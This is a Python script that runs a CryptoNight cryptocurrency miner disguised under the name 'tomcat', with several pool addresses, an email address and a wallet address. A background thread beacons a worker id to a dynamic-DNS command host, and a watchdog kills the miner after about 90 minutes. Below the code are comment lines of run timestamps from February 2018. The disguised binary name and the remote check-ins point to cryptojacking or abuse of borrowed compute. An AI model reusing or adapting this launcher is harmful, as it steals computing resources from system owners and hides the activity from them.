import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:22:04.578066
#2018-02-17 17:10:06.816116
#2018-02-17 18:58:07.408333
#2018-02-17 20:46:05.368284
#2018-02-17 22:33:01.622822
#2018-02-18 00:16:06.752230
#2018-02-18 02:06:07.635724
#2018-02-18 03:54:04.326750
#2018-02-18 05:43:07.302969
#2018-02-18 07:37:07.058438
#2018-02-18 09:25:04.155870
#2018-02-18 11:11:01.926964
#2018-02-18 12:57:06.752576
#2018-02-18 14:43:01.669739
#2018-02-18 16:33:05.615125
#2018-02-18 18:22:03.544984
#2018-02-18 20:07:06.493689
#2018-02-18 21:54:06.525832
#2018-02-18 23:43:05.775001
#2018-02-19 01:29:01.407673
#2018-02-19 03:17:06.108734
#2018-02-19 05:03:01.417718
#2018-02-19 06:47:06.011979
#2018-02-19 08:38:06.078780
#2018-02-19 10:27:01.556725
#2018-02-19 12:14:10.189523
#2018-02-19 14:02:08.523371
#2018-02-19 15:52:11.420274
#2018-02-19 17:40:11.032005
#2018-02-19 19:28:02.164367
#2018-02-19 21:17:01.952624
#2018-02-19 23:03:01.910166
#2018-02-20 00:45:09.630015
#2018-02-20 02:37:03.588586
#2018-02-20 04:26:01.380183
#2018-02-20 06:10:04.057142
#2018-02-20 07:55:06.764609
#2018-02-20 09:40:07.959809
#2018-02-20 11:24:06.550726
#2018-02-20 13:11:01.294850
#2018-02-20 14:56:04.780303
#2018-02-20 16:41:02.219059
#2018-02-20 18:27:05.421885
#2018-02-20 20:20:08.276718
#2018-02-20 22:05:06.401164
#2018-02-20 23:48:01.260486
#2018-02-21 01:35:08.309454
#2018-02-21 03:22:05.819203
#2018-02-21 05:12:02.000991
#2018-02-21 07:01:06.625819
#2018-02-21 08:46:05.564108
#2018-02-21 10:34:08.859232
#2018-02-21 12:23:07.488451
#2018-02-21 14:11:01.752786
#2018-02-21 15:59:04.488672
#2018-02-21 17:51:08.901588
#2018-02-21 19:38:01.324261
#2018-02-21 21:25:06.680743
#2018-02-21 23:11:04.925799
#2018-02-22 01:01:06.543965
#2018-02-22 02:51:01.347920
#2018-02-22 04:38:05.323388
#2018-02-22 06:22:05.745514
#2018-02-22 08:09:03.385780
#2018-02-22 09:56:07.295677
#2018-02-22 11:41:05.693806
#2018-02-22 13:27:01.976234
#2018-02-22 15:15:08.732091
#2018-02-22 17:01:10.092493
#2018-02-22 18:48:05.744257
#2018-02-22 20:41:01.327570
#2018-02-22 22:26:05.926325
#2018-02-23 00:12:04.388138
#2018-02-23 02:02:04.279885
#2018-02-23 03:51:06.855146
#2018-02-23 05:42:06.766375
#2018-02-23 07:26:08.626002
#2018-02-23 09:31:07.625372
#2018-02-23 11:39:01.448231
#2018-02-23 13:28:09.019475
#2018-02-23 15:14:04.704586
#2018-02-23 17:02:15.478597
#2018-02-23 18:48:06.594087
#2018-02-23 20:34:01.712759
#2018-02-23 22:23:05.957800
#2018-02-24 00:08:07.796442
#2018-02-24 01:59:03.781554
#2018-02-24 03:49:05.450907
#2018-02-24 05:31:07.930928
#2018-02-24 07:17:05.098624
#2018-02-24 09:07:05.704906
#2018-02-24 10:43:06.915591
#2018-02-24 12:31:02.139690
#2018-02-24 14:08:03.427295
#2018-02-24 15:40:04.543345
#2018-02-24 17:19:05.938916
#2018-02-24 18:50:09.031602
#2018-02-24 20:22:06.869636
#2018-02-24 21:49:06.952383
#2018-02-25 00:33:01.564273
#2018-02-25 02:38:07.733697
#2018-02-25 06:18:04.855393
#2018-02-25 11:40:09.183708